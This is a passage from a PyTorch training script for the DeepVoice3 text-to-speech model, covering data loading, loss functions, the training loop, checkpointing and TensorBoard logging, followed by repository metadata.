plt.tight_layout()\n plt.savefig(path, format='png')\n plt.close()\n\n\nclass TextDataSource(FileDataSource):\n def __init__(self, data_root, speaker_id=None):\n self.data_root = data_root\n self.speaker_ids = None\n self.multi_speaker = False\n # If not None, filter by speaker_id\n self.speaker_id = speaker_id\n\n def collect_files(self):\n meta = join(self.data_root, \"train.txt\")\n with open(meta, \"rb\") as f:\n lines = f.readlines()\n l = lines[0].decode(\"utf-8\").split(\"|\")\n assert len(l) == 4 or len(l) == 5\n self.multi_speaker = len(l) == 5\n texts = list(map(lambda l: l.decode(\"utf-8\").split(\"|\")[3], lines))\n if self.multi_speaker:\n speaker_ids = list(map(lambda l: int(l.decode(\"utf-8\").split(\"|\")[-1]), lines))\n # Filter by speaker_id\n # using multi-speaker dataset as a single speaker dataset\n if self.speaker_id is not None:\n indices = np.array(speaker_ids) == self.speaker_id\n texts = 
list(np.array(texts)[indices])\n self.multi_speaker = False\n return texts\n\n return texts, speaker_ids\n else:\n return texts\n\n def collect_features(self, *args):\n if self.multi_speaker:\n text, speaker_id = args\n else:\n text = args[0]\n global _frontend\n if _frontend is None:\n _frontend = getattr(frontend, hparams.frontend)\n seq = _frontend.text_to_sequence(text, p=hparams.replace_pronunciation_prob)\n\n if platform.system() == \"Windows\":\n if hasattr(hparams, 'gc_probability'):\n _frontend = None # memory leaking prevention in Windows\n if np.random.rand() < hparams.gc_probability:\n gc.collect() # garbage collection enforced\n print(\"GC done\")\n\n if self.multi_speaker:\n return np.asarray(seq, dtype=np.int32), int(speaker_id)\n else:\n return np.asarray(seq, dtype=np.int32)\n\n\nclass _NPYDataSource(FileDataSource):\n def __init__(self, data_root, col, speaker_id=None):\n self.data_root = data_root\n self.col = col\n self.frame_lengths = []\n self.speaker_id = speaker_id\n\n def collect_files(self):\n meta = join(self.data_root, \"train.txt\")\n with open(meta, \"rb\") as f:\n lines = f.readlines()\n l = lines[0].decode(\"utf-8\").split(\"|\")\n assert len(l) == 4 or len(l) == 5\n multi_speaker = len(l) == 5\n self.frame_lengths = list(\n map(lambda l: int(l.decode(\"utf-8\").split(\"|\")[2]), lines))\n\n paths = list(map(lambda l: l.decode(\"utf-8\").split(\"|\")[self.col], lines))\n paths = list(map(lambda f: join(self.data_root, f), paths))\n\n if multi_speaker and self.speaker_id is not None:\n speaker_ids = list(map(lambda l: int(l.decode(\"utf-8\").split(\"|\")[-1]), lines))\n # Filter by speaker_id\n # using multi-speaker dataset as a single speaker dataset\n indices = np.array(speaker_ids) == self.speaker_id\n paths = list(np.array(paths)[indices])\n self.frame_lengths = list(np.array(self.frame_lengths)[indices])\n # aha, need to cast numpy.int64 to int\n self.frame_lengths = list(map(int, self.frame_lengths))\n\n return paths\n\n def collect_features(self, path):\n return np.load(path)\n\n\nclass MelSpecDataSource(_NPYDataSource):\n def __init__(self, data_root, speaker_id=None):\n super(MelSpecDataSource, self).__init__(data_root, 1, speaker_id)\n\n\nclass LinearSpecDataSource(_NPYDataSource):\n def __init__(self, data_root, speaker_id=None):\n super(LinearSpecDataSource, self).__init__(data_root, 0, speaker_id)\n\n\nclass PartialyRandomizedSimilarTimeLengthSampler(Sampler):\n \"\"\"Partially randmoized sampler\n\n 1. Sort by lengths\n 2. Pick a small patch and randomize it\n 3. 
Permutate mini-batchs\n \"\"\"\n\n def __init__(self, lengths, batch_size=16, batch_group_size=None,\n permutate=True):\n self.lengths, self.sorted_indices = torch.sort(torch.LongTensor(lengths))\n self.batch_size = batch_size\n if batch_group_size is None:\n batch_group_size = min(batch_size * 32, len(self.lengths))\n if batch_group_size % batch_size != 0:\n batch_group_size -= batch_group_size % batch_size\n\n self.batch_group_size = batch_group_size\n assert batch_group_size % batch_size == 0\n self.permutate = permutate\n\n def __iter__(self):\n indices = self.sorted_indices.clone()\n batch_group_size = self.batch_group_size\n s, e = 0, 0\n for i in range(len(indices) // batch_group_size):\n s = i * batch_group_size\n e = s + batch_group_size\n random.shuffle(indices[s:e])\n\n # Permutate batches\n if self.permutate:\n perm = np.arange(len(indices[:e]) // self.batch_size)\n random.shuffle(perm)\n indices[:e] = indices[:e].view(-1, self.batch_size)[perm, :].view(-1)\n\n # Handle last elements\n s += batch_group_size\n if s < len(indices):\n random.shuffle(indices[s:])\n\n return iter(indices)\n\n def __len__(self):\n return len(self.sorted_indices)\n\n\nclass PyTorchDataset(object):\n def __init__(self, X, Mel, Y):\n self.X = X\n self.Mel = Mel\n self.Y = Y\n # alias\n self.multi_speaker = X.file_data_source.multi_speaker\n\n def __getitem__(self, idx):\n if self.multi_speaker:\n text, speaker_id = self.X[idx]\n return text, self.Mel[idx], self.Y[idx], speaker_id\n else:\n return self.X[idx], self.Mel[idx], self.Y[idx]\n\n def __len__(self):\n return len(self.X)\n\n\ndef sequence_mask(sequence_length, max_len=None):\n if max_len is None:\n max_len = sequence_length.data.max()\n batch_size = sequence_length.size(0)\n seq_range = torch.arange(0, max_len).long()\n seq_range_expand = seq_range.unsqueeze(0).expand(batch_size, max_len)\n if sequence_length.is_cuda:\n seq_range_expand = seq_range_expand.cuda()\n seq_length_expand = sequence_length.unsqueeze(1) \\\n .expand_as(seq_range_expand)\n return (seq_range_expand < seq_length_expand).float()\n\n\nclass MaskedL1Loss(nn.Module):\n def __init__(self):\n super(MaskedL1Loss, self).__init__()\n self.criterion = nn.L1Loss(reduction=\"sum\")\n\n def forward(self, input, target, lengths=None, mask=None, max_len=None):\n if lengths is None and mask is None:\n raise RuntimeError(\"Should provide either lengths or mask\")\n\n # (B, T, 1)\n if mask is None:\n mask = sequence_mask(lengths, max_len).unsqueeze(-1)\n\n # (B, T, D)\n mask_ = mask.expand_as(input)\n loss = self.criterion(input * mask_, target * mask_)\n return loss / mask_.sum()\n\n\ndef collate_fn(batch):\n \"\"\"Create batch\"\"\"\n r = hparams.outputs_per_step\n downsample_step = hparams.downsample_step\n multi_speaker = len(batch[0]) == 4\n\n # Lengths\n input_lengths = [len(x[0]) for x in batch]\n max_input_len = max(input_lengths)\n\n target_lengths = [len(x[1]) for x in batch]\n\n max_target_len = max(target_lengths)\n if max_target_len % r != 0:\n max_target_len += r - max_target_len % r\n assert max_target_len % r == 0\n if max_target_len % downsample_step != 0:\n max_target_len += downsample_step - max_target_len % downsample_step\n assert max_target_len % downsample_step == 0\n\n # Set 0 for zero beginning padding\n # imitates initial decoder states\n b_pad = r\n max_target_len += b_pad * downsample_step\n\n a = np.array([_pad(x[0], max_input_len) for x in batch], dtype=np.int)\n x_batch = torch.LongTensor(a)\n\n input_lengths = torch.LongTensor(input_lengths)\n target_lengths 
= torch.LongTensor(target_lengths)\n\n b = np.array([_pad_2d(x[1], max_target_len, b_pad=b_pad) for x in batch],\n dtype=np.float32)\n mel_batch = torch.FloatTensor(b)\n\n c = np.array([_pad_2d(x[2], max_target_len, b_pad=b_pad) for x in batch],\n dtype=np.float32)\n y_batch = torch.FloatTensor(c)\n\n # text positions\n text_positions = np.array([_pad(np.arange(1, len(x[0]) + 1), max_input_len)\n for x in batch], dtype=np.int)\n text_positions = torch.LongTensor(text_positions)\n\n max_decoder_target_len = max_target_len // r // downsample_step\n\n # frame positions\n s, e = 1, max_decoder_target_len + 1\n # if b_pad > 0:\n # s, e = s - 1, e - 1\n # NOTE: needs clone to supress RuntimeError in dataloarder...\n # ref: https://github.com/pytorch/pytorch/issues/10756\n frame_positions = torch.arange(s, e).long().unsqueeze(0).expand(\n len(batch), max_decoder_target_len).clone()\n\n # done flags\n done = np.array([_pad(np.zeros(len(x[1]) // r // downsample_step - 1),\n max_decoder_target_len, constant_values=1)\n for x in batch])\n done = torch.FloatTensor(done).unsqueeze(-1)\n\n if multi_speaker:\n speaker_ids = torch.LongTensor([x[3] for x in batch])\n else:\n speaker_ids = None\n\n return x_batch, input_lengths, mel_batch, y_batch, \\\n (text_positions, frame_positions), done, target_lengths, speaker_ids\n\n\ndef time_string():\n return datetime.now().strftime('%Y-%m-%d %H:%M')\n\n\ndef save_alignment(path, attn):\n plot_alignment(attn.T, path, info=\"{}, {}, step={}\".format(\n hparams.builder, time_string(), global_step))\n\n\ndef prepare_spec_image(spectrogram):\n # [0, 1]\n spectrogram = (spectrogram - np.min(spectrogram)) / (np.max(spectrogram) - np.min(spectrogram))\n spectrogram = np.flip(spectrogram, axis=1) # flip against freq axis\n return np.uint8(cm.magma(spectrogram.T) * 255)\n\n\ndef eval_model(global_step, writer, device, model, checkpoint_dir, ismultispeaker):\n # harded coded\n texts = [\n \"Scientists at the CERN laboratory say they have discovered a new particle.\",\n \"There's a way to measure the acute emotional intelligence that has never gone out of style.\",\n \"President Trump met with other leaders at the Group of 20 conference.\",\n \"Generative adversarial network or variational auto-encoder.\",\n \"Please call Stella.\",\n \"Some have accepted this as a miracle without any physical explanation.\",\n ]\n import synthesis\n synthesis._frontend = _frontend\n\n eval_output_dir = join(checkpoint_dir, \"eval\")\n os.makedirs(eval_output_dir, exist_ok=True)\n\n # Prepare model for evaluation\n model_eval = build_model().to(device)\n model_eval.load_state_dict(model.state_dict())\n\n # hard coded\n speaker_ids = [0, 1, hparams.n_speakers-1] if ismultispeaker else [None]\n for speaker_id in speaker_ids:\n speaker_str = \"multispeaker{}\".format(speaker_id) if speaker_id is not None else \"single\"\n\n for idx, text in enumerate(texts):\n signal, alignment, _, mel = synthesis.tts(\n model_eval, text, p=0, speaker_id=speaker_id, fast=True)\n signal /= np.max(np.abs(signal))\n\n # Alignment\n path = join(eval_output_dir, \"step{:09d}_text{}_{}_alignment.png\".format(\n global_step, idx, speaker_str))\n save_alignment(path, alignment)\n tag = \"eval_averaged_alignment_{}_{}\".format(idx, speaker_str)\n try:\n writer.add_image(tag, np.uint8(cm.viridis(np.flip(alignment, 1).T) * 255), global_step)\n except Exception as e:\n warn(str(e))\n\n # Mel\n try:\n writer.add_image(\"(Eval) Predicted mel spectrogram text{}_{}\".format(idx, speaker_str),\n prepare_spec_image(mel), 
global_step)\n except Exception as e:\n warn(str(e))\n\n # Audio\n path = join(eval_output_dir, \"step{:09d}_text{}_{}_predicted.wav\".format(\n global_step, idx, speaker_str))\n audio.save_wav(signal, path)\n\n try:\n writer.add_audio(\"(Eval) Predicted audio signal {}_{}\".format(idx, speaker_str),\n signal, global_step, sample_rate=hparams.sample_rate)\n except Exception as e:\n warn(str(e))\n pass\n\n\ndef save_states(global_step, writer, mel_outputs, linear_outputs, attn, mel, y,\n input_lengths, checkpoint_dir=None):\n print(\"Save intermediate states at step {}\".format(global_step))\n\n # idx = np.random.randint(0, len(input_lengths))\n idx = min(1, len(input_lengths) - 1)\n input_length = input_lengths[idx]\n\n # Alignment\n # Multi-hop attention\n if attn is not None and attn.dim() == 4:\n for i, alignment in enumerate(attn):\n alignment = alignment[idx].cpu().data.numpy()\n tag = \"alignment_layer{}\".format(i + 1)\n try:\n writer.add_image(tag, np.uint8(cm.viridis(\n np.flip(alignment, 1).T) * 255), global_step)\n # save files as well for now\n alignment_dir = join(\n checkpoint_dir, \"alignment_layer{}\".format(i + 1))\n os.makedirs(alignment_dir, exist_ok=True)\n path = join(alignment_dir, \"step{:09d}_layer_{}_alignment.png\".format(\n global_step, i + 1))\n save_alignment(path, alignment)\n except Exception as e:\n warn(str(e))\n\n # Save averaged alignment\n alignment_dir = join(checkpoint_dir, \"alignment_ave\")\n os.makedirs(alignment_dir, exist_ok=True)\n path = join(alignment_dir, \"step{:09d}_layer_alignment.png\".format(global_step))\n alignment = attn.mean(0)[idx].cpu().data.numpy()\n save_alignment(path, alignment)\n tag = \"averaged_alignment\"\n\n try:\n writer.add_image(tag, np.uint8(cm.viridis(\n np.flip(alignment, 1).T) * 255), global_step)\n except Exception as e:\n warn(str(e))\n\n # Predicted mel spectrogram\n if mel_outputs is not None:\n mel_output = mel_outputs[idx].cpu().data.numpy()\n mel_output = prepare_spec_image(audio._denormalize(mel_output))\n try:\n writer.add_image(\"Predicted mel spectrogram\",\n mel_output, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n # Predicted spectrogram\n if linear_outputs is not None:\n linear_output = linear_outputs[idx].cpu().data.numpy()\n spectrogram = prepare_spec_image(audio._denormalize(linear_output))\n try:\n writer.add_image(\"Predicted linear spectrogram\",\n spectrogram, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n # Predicted audio signal\n signal = audio.inv_spectrogram(linear_output.T)\n signal /= np.max(np.abs(signal))\n path = join(checkpoint_dir, \"step{:09d}_predicted.wav\".format(\n global_step))\n try:\n writer.add_audio(\"Predicted audio signal\", signal,\n global_step, sample_rate=hparams.sample_rate)\n except Exception as e:\n warn(str(e))\n pass\n audio.save_wav(signal, path)\n\n # Target mel spectrogram\n if mel_outputs is not None:\n mel_output = mel[idx].cpu().data.numpy()\n mel_output = prepare_spec_image(audio._denormalize(mel_output))\n try:\n writer.add_image(\"Target mel spectrogram\", mel_output, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n # Target spectrogram\n if linear_outputs is not None:\n linear_output = y[idx].cpu().data.numpy()\n spectrogram = prepare_spec_image(audio._denormalize(linear_output))\n try:\n writer.add_image(\"Target linear spectrogram\",\n spectrogram, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n\ndef logit(x, eps=1e-8):\n return torch.log(x + eps) - torch.log(1 - x + eps)\n\n\ndef 
masked_mean(y, mask):\n # (B, T, D)\n mask_ = mask.expand_as(y)\n return (y * mask_).sum() / mask_.sum()\n\n\ndef spec_loss(y_hat, y, mask, priority_bin=None, priority_w=0):\n masked_l1 = MaskedL1Loss()\n l1 = nn.L1Loss()\n\n w = hparams.masked_loss_weight\n\n # L1 loss\n if w > 0:\n assert mask is not None\n l1_loss = w * masked_l1(y_hat, y, mask=mask) + (1 - w) * l1(y_hat, y)\n else:\n assert mask is None\n l1_loss = l1(y_hat, y)\n\n # Priority L1 loss\n if priority_bin is not None and priority_w > 0:\n if w > 0:\n priority_loss = w * masked_l1(\n y_hat[:, :, :priority_bin], y[:, :, :priority_bin], mask=mask) \\\n + (1 - w) * l1(y_hat[:, :, :priority_bin], y[:, :, :priority_bin])\n else:\n priority_loss = l1(y_hat[:, :, :priority_bin], y[:, :, :priority_bin])\n l1_loss = (1 - priority_w) * l1_loss + priority_w * priority_loss\n\n # Binary divergence loss\n if hparams.binary_divergence_weight <= 0:\n binary_div = y.data.new(1).zero_()\n else:\n y_hat_logits = logit(y_hat)\n z = -y * y_hat_logits + torch.log1p(torch.exp(y_hat_logits))\n if w > 0:\n binary_div = w * masked_mean(z, mask) + (1 - w) * z.mean()\n else:\n binary_div = z.mean()\n\n return l1_loss, binary_div\n\n\n@jit(nopython=True)\ndef guided_attention(N, max_N, T, max_T, g):\n W = np.zeros((max_N, max_T), dtype=np.float32)\n for n in range(N):\n for t in range(T):\n W[n, t] = 1 - np.exp(-(n / N - t / T)**2 / (2 * g * g))\n return W\n\n\ndef guided_attentions(input_lengths, target_lengths, max_target_len, g=0.2):\n B = len(input_lengths)\n max_input_len = input_lengths.max()\n W = np.zeros((B, max_target_len, max_input_len), dtype=np.float32)\n for b in range(B):\n W[b] = guided_attention(input_lengths[b], max_input_len,\n target_lengths[b], max_target_len, g).T\n return W\n\n\ndef train(device, model, data_loader, optimizer, writer,\n init_lr=0.002,\n checkpoint_dir=None, checkpoint_interval=None, nepochs=None,\n clip_thresh=1.0,\n train_seq2seq=True, train_postnet=True):\n linear_dim = model.linear_dim\n r = hparams.outputs_per_step\n downsample_step = hparams.downsample_step\n current_lr = init_lr\n\n binary_criterion = nn.BCELoss()\n\n assert train_seq2seq or train_postnet\n\n global global_step, global_epoch\n while global_epoch < nepochs:\n running_loss = 0.\n for step, (x, input_lengths, mel, y, positions, done, target_lengths,\n speaker_ids) \\\n in tqdm(enumerate(data_loader)):\n model.train()\n ismultispeaker = speaker_ids is not None\n # Learning rate schedule\n if hparams.lr_schedule is not None:\n lr_schedule_f = getattr(lrschedule, hparams.lr_schedule)\n current_lr = lr_schedule_f(\n init_lr, global_step, **hparams.lr_schedule_kwargs)\n for param_group in optimizer.param_groups:\n param_group['lr'] = current_lr\n optimizer.zero_grad()\n\n # Used for Position encoding\n text_positions, frame_positions = positions\n\n # Downsample mel spectrogram\n if downsample_step > 1:\n mel = mel[:, 0::downsample_step, :].contiguous()\n\n # Lengths\n input_lengths = input_lengths.long().numpy()\n decoder_lengths = target_lengths.long().numpy() // r // downsample_step\n\n max_seq_len = max(input_lengths.max(), decoder_lengths.max())\n if max_seq_len >= hparams.max_positions:\n raise RuntimeError(\n \"\"\"max_seq_len ({}) >= max_positions ({})\nInput text or decoder target length exceeded the maximum length.\nPlease set a larger value for ``max_positions`` in hyper parameters.\"\"\".format(\n max_seq_len, hparams.max_positions))\n\n # Transform data to CUDA device\n if train_seq2seq:\n x = x.to(device)\n text_positions = 
text_positions.to(device)\n frame_positions = frame_positions.to(device)\n if train_postnet:\n y = y.to(device)\n mel, done = mel.to(device), done.to(device)\n target_lengths = target_lengths.to(device)\n speaker_ids = speaker_ids.to(device) if ismultispeaker else None\n\n # Create mask if we use masked loss\n if hparams.masked_loss_weight > 0:\n # decoder output domain mask\n decoder_target_mask = sequence_mask(\n target_lengths // (r * downsample_step),\n max_len=mel.size(1)).unsqueeze(-1)\n if downsample_step > 1:\n # spectrogram-domain mask\n target_mask = sequence_mask(\n target_lengths, max_len=y.size(1)).unsqueeze(-1)\n else:\n target_mask = decoder_target_mask\n # shift mask\n decoder_target_mask = decoder_target_mask[:, r:, :]\n target_mask = target_mask[:, r:, :]\n else:\n decoder_target_mask, target_mask = None, None\n\n # Apply model\n if train_seq2seq and train_postnet:\n mel_outputs, linear_outputs, attn, done_hat = model(\n x, mel, speaker_ids=speaker_ids,\n text_positions=text_positions, frame_positions=frame_positions,\n input_lengths=input_lengths)\n elif train_seq2seq:\n assert speaker_ids is None\n mel_outputs, attn, done_hat, _ = model.seq2seq(\n x, mel,\n text_positions=text_positions, frame_positions=frame_positions,\n input_lengths=input_lengths)\n # reshape\n mel_outputs = mel_outputs.view(len(mel), -1, mel.size(-1))\n linear_outputs = None\n elif train_postnet:\n assert speaker_ids is None\n linear_outputs = model.postnet(mel)\n mel_outputs, attn, done_hat = None, None, None\n\n # Losses\n w = hparams.binary_divergence_weight\n\n # mel:\n if train_seq2seq:\n mel_l1_loss, mel_binary_div = spec_loss(\n mel_outputs[:, :-r, :], mel[:, r:, :], decoder_target_mask)\n mel_loss = (1 - w) * mel_l1_loss + w * mel_binary_div\n\n # done:\n if train_seq2seq:\n done_loss = binary_criterion(done_hat, done)\n\n # linear:\n if train_postnet:\n n_priority_freq = int(hparams.priority_freq / (hparams.sample_rate * 0.5) * linear_dim)\n linear_l1_loss, linear_binary_div = spec_loss(\n linear_outputs[:, :-r, :], y[:, r:, :], target_mask,\n priority_bin=n_priority_freq,\n priority_w=hparams.priority_freq_weight)\n linear_loss = (1 - w) * linear_l1_loss + w * linear_binary_div\n\n # Combine losses\n if train_seq2seq and train_postnet:\n loss = mel_loss + linear_loss + done_loss\n elif train_seq2seq:\n loss = mel_loss + done_loss\n elif train_postnet:\n loss = linear_loss\n\n # attention\n if train_seq2seq and hparams.use_guided_attention:\n soft_mask = guided_attentions(input_lengths, decoder_lengths,\n attn.size(-2),\n g=hparams.guided_attention_sigma)\n soft_mask = torch.from_numpy(soft_mask).to(device)\n attn_loss = (attn * soft_mask).mean()\n loss += attn_loss\n\n if global_step > 0 and global_step % checkpoint_interval == 0:\n save_states(\n global_step, writer, mel_outputs, linear_outputs, attn,\n mel, y, input_lengths, checkpoint_dir)\n save_checkpoint(\n model, optimizer, global_step, checkpoint_dir, global_epoch,\n train_seq2seq, train_postnet)\n\n if global_step > 0 and global_step % hparams.eval_interval == 0:\n eval_model(global_step, writer, device, model,\n checkpoint_dir, ismultispeaker)\n\n # Update\n loss.backward()\n if clip_thresh > 0:\n grad_norm = torch.nn.utils.clip_grad_norm_(\n model.get_trainable_parameters(), clip_thresh)\n optimizer.step()\n\n # Logs\n writer.add_scalar(\"loss\", float(loss.item()), global_step)\n if train_seq2seq:\n writer.add_scalar(\"done_loss\", float(done_loss.item()), global_step)\n writer.add_scalar(\"mel loss\", float(mel_loss.item()), 
global_step)\n writer.add_scalar(\"mel_l1_loss\", float(mel_l1_loss.item()), global_step)\n writer.add_scalar(\"mel_binary_div_loss\", float(mel_binary_div.item()), global_step)\n if train_postnet:\n writer.add_scalar(\"linear_loss\", float(linear_loss.item()), global_step)\n writer.add_scalar(\"linear_l1_loss\", float(linear_l1_loss.item()), global_step)\n writer.add_scalar(\"linear_binary_div_loss\", float(linear_binary_div.item()), global_step)\n if train_seq2seq and hparams.use_guided_attention:\n writer.add_scalar(\"attn_loss\", float(attn_loss.item()), global_step)\n if clip_thresh > 0:\n writer.add_scalar(\"gradient norm\", grad_norm, global_step)\n writer.add_scalar(\"learning rate\", current_lr, global_step)\n\n global_step += 1\n running_loss += loss.item()\n\n averaged_loss = running_loss / (len(data_loader))\n writer.add_scalar(\"loss (per epoch)\", averaged_loss, global_epoch)\n print(\"Loss: {}\".format(running_loss / (len(data_loader))))\n\n global_epoch += 1\n\n\ndef save_checkpoint(model, optimizer, step, checkpoint_dir, epoch,\n train_seq2seq, train_postnet):\n if train_seq2seq and train_postnet:\n suffix = \"\"\n m = model\n elif train_seq2seq:\n suffix = \"_seq2seq\"\n m = model.seq2seq\n elif train_postnet:\n suffix = \"_postnet\"\n m = model.postnet\n\n checkpoint_path = join(\n checkpoint_dir, \"checkpoint_step{:09d}{}.pth\".format(global_step, suffix))\n optimizer_state = optimizer.state_dict() if hparams.save_optimizer_state else None\n torch.save({\n \"state_dict\": m.state_dict(),\n \"optimizer\": optimizer_state,\n \"global_step\": step,\n \"global_epoch\": epoch,\n }, checkpoint_path)\n print(\"Saved checkpoint:\", checkpoint_path)\n\n\ndef build_model():\n model = getattr(builder, hparams.builder)(\n n_speakers=hparams.n_speakers,\n speaker_embed_dim=hparams.speaker_embed_dim,\n n_vocab=_frontend.n_vocab,\n embed_dim=hparams.text_embed_dim,\n mel_dim=hparams.num_mels,\n linear_dim=hparams.fft_size // 2 + 1,\n r=hparams.outputs_per_step,\n downsample_step=hparams.downsample_step,\n padding_idx=hparams.padding_idx,\n dropout=hparams.dropout,\n kernel_size=hparams.kernel_size,\n encoder_channels=hparams.encoder_channels,\n decoder_channels=hparams.decoder_channels,\n converter_channels=hparams.converter_channels,\n use_memory_mask=hparams.use_memory_mask,\n trainable_positional_encodings=hparams.trainable_positional_encodings,\n force_monotonic_attention=hparams.force_monotonic_attention,\n use_decoder_state_for_postnet_input=hparams.use_decoder_state_for_postnet_input,\n max_positions=hparams.max_positions,\n speaker_embedding_weight_std=hparams.speaker_embedding_weight_std,\n freeze_embedding=hparams.freeze_embedding,\n window_ahead=hparams.window_ahead,\n window_backward=hparams.window_backward,\n key_projection=hparams.key_projection,\n value_projection=hparams.value_projection,\n )\n return model\n\n\ndef _load(checkpoint_path):\n if use_cuda:\n checkpoint = torch.load(checkpoint_path)\n else:\n checkpoint = torch.load(checkpoint_path,\n map_location=lambda storage, loc: storage)\n return checkpoint\n\n\ndef load_checkpoint(path, model, optimizer, reset_optimizer):\n global global_step\n global global_epoch\n\n print(\"Load checkpoint from: {}\".format(path))\n checkpoint = _load(path)\n model.load_state_dict(checkpoint[\"state_dict\"])\n if not reset_optimizer:\n optimizer_state = checkpoint[\"optimizer\"]\n if optimizer_state is not None:\n print(\"Load optimizer state from {}\".format(path))\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n 
global_step = checkpoint[\"global_step\"]\n global_epoch = checkpoint[\"global_epoch\"]\n\n return model\n\n\ndef _load_embedding(path, model):\n state = _load(path)[\"state_dict\"]\n key = \"seq2seq.encoder.embed_tokens.weight\"\n model.seq2seq.encoder.embed_tokens.weight.data = state[key]\n\n# https://discuss.pytorch.org/t/how-to-load-part-of-pre-trained-model/1113/3\n\n\ndef restore_parts(path, model):\n print(\"Restore part of the model from: {}\".format(path))\n state = _load(path)[\"state_dict\"]\n model_dict = model.state_dict()\n valid_state_dict = {k: v for k, v in state.items() if k in model_dict}\n\n try:\n model_dict.update(valid_state_dict)\n model.load_state_dict(model_dict)\n except RuntimeError as e:\n # there should be invalid size of weight(s), so load them per parameter\n print(str(e))\n model_dict = model.state_dict()\n for k, v in valid_state_dict.items():\n model_dict[k] = v\n try:\n model.load_state_dict(model_dict)\n except RuntimeError as e:\n print(str(e))\n warn(\"{}: may contain invalid size of weight. skipping...\".format(k))\n\n\nif __name__ == \"__main__\":\n args = docopt(__doc__)\n print(\"Command line args:\\n\", args)\n checkpoint_dir = args[\"--checkpoint-dir\"]\n checkpoint_path = args[\"--checkpoint\"]\n checkpoint_seq2seq_path = args[\"--checkpoint-seq2seq\"]\n checkpoint_postnet_path = args[\"--checkpoint-postnet\"]\n load_embedding = args[\"--load-embedding\"]\n checkpoint_restore_parts = args[\"--restore-parts\"]\n speaker_id = args[\"--speaker-id\"]\n speaker_id = int(speaker_id) if speaker_id is not None else None\n preset = args[\"--preset\"]\n\n data_root = args[\"--data-root\"]\n if data_root is None:\n data_root = join(dirname(__file__), \"data\", \"ljspeech\")\n\n log_event_path = args[\"--log-event-path\"]\n reset_optimizer = args[\"--reset-optimizer\"]\n\n # Which model to be trained\n train_seq2seq = args[\"--train-seq2seq-only\"]\n train_postnet = args[\"--train-postnet-only\"]\n # train both if not specified\n if not train_seq2seq and not train_postnet:\n print(\"Training whole model\")\n train_seq2seq, train_postnet = True, True\n if train_seq2seq:\n print(\"Training seq2seq model\")\n elif train_postnet:\n print(\"Training postnet model\")\n else:\n assert False, \"invalid combination of training args\"\n\n # Load preset if specified\n if preset is not None:\n with open(preset) as f:\n hparams.parse_json(f.read())\n # Override hyper parameters\n hparams.parse(args[\"--hparams\"])\n\n # Preventing Windows specific error such as MemoryError\n # Also reduces the occurrence of THAllocator.c 0x05 error in Windows build of PyTorch\n if platform.system() == \"Windows\":\n print(\" [!] 
Windows Detected - IF THAllocator.c 0x05 error occurs SET num_workers to 1\")\n\n assert hparams.name == \"deepvoice3\"\n print(hparams_debug_string())\n\n _frontend = getattr(frontend, hparams.frontend)\n\n os.makedirs(checkpoint_dir, exist_ok=True)\n\n # Input dataset definitions\n X = FileSourceDataset(TextDataSource(data_root, speaker_id))\n Mel = FileSourceDataset(MelSpecDataSource(data_root, speaker_id))\n Y = FileSourceDataset(LinearSpecDataSource(data_root, speaker_id))\n\n # Prepare sampler\n frame_lengths = Mel.file_data_source.frame_lengths\n sampler = PartialyRandomizedSimilarTimeLengthSampler(\n frame_lengths, batch_size=hparams.batch_size)\n\n # Dataset and Dataloader setup\n dataset = PyTorchDataset(X, Mel, Y)\n data_loader = data_utils.DataLoader(\n dataset, batch_size=hparams.batch_size,\n num_workers=hparams.num_workers, sampler=sampler,\n collate_fn=collate_fn, pin_memory=hparams.pin_memory, drop_last=True)\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n # Model\n model = build_model().to(device)\n\n optimizer = optim.Adam(model.get_trainable_parameters(),\n lr=hparams.initial_learning_rate, betas=(\n hparams.adam_beta1, hparams.adam_beta2),\n eps=hparams.adam_eps, weight_decay=hparams.weight_decay,\n amsgrad=hparams.amsgrad)\n\n if checkpoint_restore_parts is not None:\n restore_parts(checkpoint_restore_parts, model)\n\n # Load checkpoints\n if checkpoint_postnet_path is not None:\n load_checkpoint(checkpoint_postnet_path, model.postnet, optimizer, reset_optimizer)\n\n if checkpoint_seq2seq_path is not None:\n load_checkpoint(checkpoint_seq2seq_path, model.seq2seq, optimizer, reset_optimizer)\n\n if checkpoint_path is not None:\n load_checkpoint(checkpoint_path, model, optimizer, reset_optimizer)\n\n # Load embedding\n if load_embedding is not None:\n print(\"Loading embedding from {}\".format(load_embedding))\n _load_embedding(load_embedding, model)\n\n # Setup summary writer for tensorboard\n if log_event_path is None:\n if platform.system() == \"Windows\":\n log_event_path = \"log/run-test\" + str(datetime.now()).replace(\" \", \"_\").replace(\":\", \"_\")\n else:\n log_event_path = \"log/run-test\" + str(datetime.now()).replace(\" \", \"_\")\n print(\"Log event path: {}\".format(log_event_path))\n writer = SummaryWriter(log_event_path)\n\n # Train!\n try:\n train(device, model, data_loader, optimizer, writer,\n init_lr=hparams.initial_learning_rate,\n checkpoint_dir=checkpoint_dir,\n checkpoint_interval=hparams.checkpoint_interval,\n nepochs=hparams.nepochs,\n clip_thresh=hparams.clip_thresh,\n train_seq2seq=train_seq2seq, train_postnet=train_postnet)\n except KeyboardInterrupt:\n save_checkpoint(\n model, optimizer, global_step, checkpoint_dir, global_epoch,\n train_seq2seq, train_postnet)\n\n print(\"Finished\")\n sys.exit(0)\n", "repo_name": "r9y9/deepvoice3_pytorch", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 38196, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1900, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.cuda.is_available", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.pad", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 73, "usage_type": "call"}, 
